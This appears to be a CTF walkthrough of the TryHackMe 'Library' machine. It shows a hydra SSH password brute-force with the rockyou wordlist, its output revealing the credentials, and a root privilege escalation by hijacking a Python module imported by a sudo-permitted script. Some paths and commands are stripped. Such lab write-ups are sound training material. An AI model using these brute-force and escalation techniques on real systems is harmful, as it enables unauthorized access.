boot2root machine for FIT and bsides guatemala CTF

This is Library from THM. Like Dav, this one is ranked easy and doesn’t give any hints as to what it’s about. I’ve been away at the beach for a few days hence no hacking. In fact, these were the first days I’ve not done any at all for probably 6 months.


HTTP and SSH only, on the standard ports.


This is where I spent the vast majority of the time on this box. The landing page was a very basic blog but did include a form supposedly for posting a comment. I tried an escalating series of gobusting searches but found nothing useful.

I ran various fuzzing techniques on the the POST request with Burp Suite. I captured a request and ran it against sqlmap; nothing.

I downloaded a few images and ran some basic stego checks against them; nothing.

Eventually I ran hydra against SSH:

root@kali:/opt/tryhackme/bsidesgtlibrary# hydra -l meliodas -P /usr/share/wordlists/rockyou.txt ssh://
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra ( starting at 2021-01-02 03:36:49
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://
[STATUS] 151.00 tries/min, 151 tries in 00:01h, 14344249 to do in 1583:16h, 16 active
[22][ssh] host:   login: meliodas   password: iloveyou1


Presumably this was supposed to be the main challenge of this box, but it’s effectively the same as Wonderland.

meliodas@ubuntu:~$ sudo -l
Matching Defaults entries for meliodas on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User meliodas may run the following commands on ubuntu:
    (ALL) NOPASSWD: /usr/bin/python* /home/meliodas/
meliodas@ubuntu:~$ cat /home/meliodas/
#!/usr/bin/env python
import os
import zipfile

def zipdir(path, ziph):
    for root, dirs, files in os.walk(path):
        for file in files:
            ziph.write(os.path.join(root, file))

if __name__ == '__main__':
    zipf = zipfile.ZipFile('/var/backups/', 'w', zipfile.ZIP_DEFLATED)
    zipdir('/var/www/html', zipf)

So; we have a script which we can run as root that imports both os and zipfile. We can create our own version of, make it executable, and ….

root@ubuntu:~# cat 
import os
meliodas@ubuntu:~$ sudo -u root /usr/bin/python3 /home/meliodas/
root@ubuntu:~# cd /root/
root@ubuntu:/root# ls -lash
total 28K
4.0K drwx------  3 root root 4.0K Aug 24  2019 .
4.0K drwxr-xr-x 22 root root 4.0K Aug 24  2019 ..
4.0K -rw-------  1 root root   43 Aug 24  2019 .bash_history
4.0K -rw-r--r--  1 root root 3.1K Oct 22  2015 .bashrc
4.0K drwxr-xr-x  2 root root 4.0K Aug 23  2019 .nano
4.0K -rw-r--r--  1 root root  148 Aug 17  2015 .profile
4.0K -rw-r--r--  1 root root   33 Aug 23  2019 root.txt
root@ubuntu:/root# cat root.txt

That was that.